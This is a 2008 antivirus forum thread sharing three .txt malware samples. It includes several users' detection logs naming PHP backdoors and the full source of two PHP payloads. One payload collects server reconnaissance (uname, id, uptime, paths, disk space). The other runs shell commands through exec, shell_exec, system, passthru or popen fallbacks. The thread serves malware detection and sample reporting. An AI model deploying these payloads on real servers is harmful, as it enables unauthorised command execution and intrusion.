3个txt

显示全部楼层 · 发表于 2008-8-10 08:35:34

Sign of "PHP:Small-A [Trj]" has been found in "E:\download\txt.rar\2.txt" file.

显示全部楼层 · 发表于 2008-8-10 08:49:09

2008-8-10 8:46:53 http://bbs.kafan.cn/attachment.p ... t=1218329321//2.txt Detected: Backdoor.PHP.Small.t

显示全部楼层 · 发表于 2008-8-10 08:50:57

http://bbs.kafan.cn/attachment.p ... t=1218329372//2.txt Opera Internet Browser 拒绝: Backdoor.PHP.Small.t

显示全部楼层 · 发表于 2008-8-10 08:58:29

卡巴8阻止下载.

显示全部楼层 · 发表于 2008-8-10 09:23:30

antivir.

The file 'H:\txt\3.txt'
contained a virus or unwanted program 'BDS/PHP.ali.4' [backdoor]
Action(s) taken:The file was deleted!

The file 'H:\txt\2.txt'
contained a virus or unwanted program 'BDS/PHP.Small.T' [backdoor]
Action(s) taken:The file was deleted!

显示全部楼层 · 发表于 2008-8-10 09:28:19

上报费尔

显示全部楼层 · 发表于 2008-8-10 09:39:35

1.txt             0.76/0.76KB       100.00% 在线扫描    没有发现病毒，但这并不能说明此文件百分之百可信。2008-8-10 9:38:32 2008-8-10 9:38:35
2.txt             0.76/0.76KB       100.00% 在线扫描    它是一个“后门程序”2008-8-10 9:38:37 2008-8-10 9:38:40
3.txt             0.97/0.97KB       100.00% 在线扫描    它是一个“后门程序”2008-8-10 9:38:40 2008-8-10 9:38:43

显示全部楼层 · 发表于 2008-8-10 10:12:14

<?php
function ConvertBytes($number)
{
 $len = strlen($number);
 if($len < 4)
 {
 return sprintf("%d b", $number);
 }
 if($len >= 4 && $len <=6)
 {
 return sprintf("%0.2f Kb", $number/1024);
 }
 if($len >= 7 && $len <=9)
 {
 return sprintf("%0.2f Mb", $number/1024/1024);
 }

 return sprintf("%0.2f Gb", $number/1024/1024/1024);

}

echo "Osirys ";
$un = @php_uname();
$up = system(uptime);
$id1 = system(id);
$pwd1 = @getcwd();
$sof1 = getenv("SERVER_SOFTWARE");
$php1 = phpversion();
$name1 = $_SERVER['SERVER_NAME'];
$ip1 = gethostbyname($SERVER_ADDR);
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;

echo "Naiz was here .. ";
echo "uname -a: $un ";
echo "os: $os ";
echo "uptime: $up ";
echo "id: $id1 ";
echo "pwd: $pwd1 ";
echo "php: $php1 ";
echo "software: $sof1 ";
echo "server-name: $name1 ";
echo "server-ip: $ip1 ";
echo "free: $free ";
echo "used: $used ";
echo "total: $all ";
exit;

显示全部楼层 · 发表于 2008-8-10 10:12:36

<?
$dir = @getcwd();
echo "Mic22 ";
$OS = @PHP_OS;
echo "OSTYPE:$OS ";
$free = disk_free_space($dir);

if ($free === FALSE) {$free = 0;}

if ($free < 0) {$free = 0;}
echo "Free:".view_size($free)." ";

$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd;

function ex($cfe){
$res = '';
if (!empty($cfe)){
if(function_exists('exec')){
@exec($cfe,$res);
$res = join("\n",$res);
}
elseif(function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(function_exists('system')){
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(function_exists('passthru')){
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif(@is_resource($f = @popen($cfe,"r"))){
$res = "";
while(!@feof($f)) { $res .= @fread($f,1024); }
@pclose($f);
}}
return $res;
}

function view_size($size)

{

if (!is_numeric($size)) {return FALSE;}

else

{

if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}

elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}

elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}

else {$size = $size . " B";}

return $size;

}}

exit;

[病毒样本] 3个txt

1

2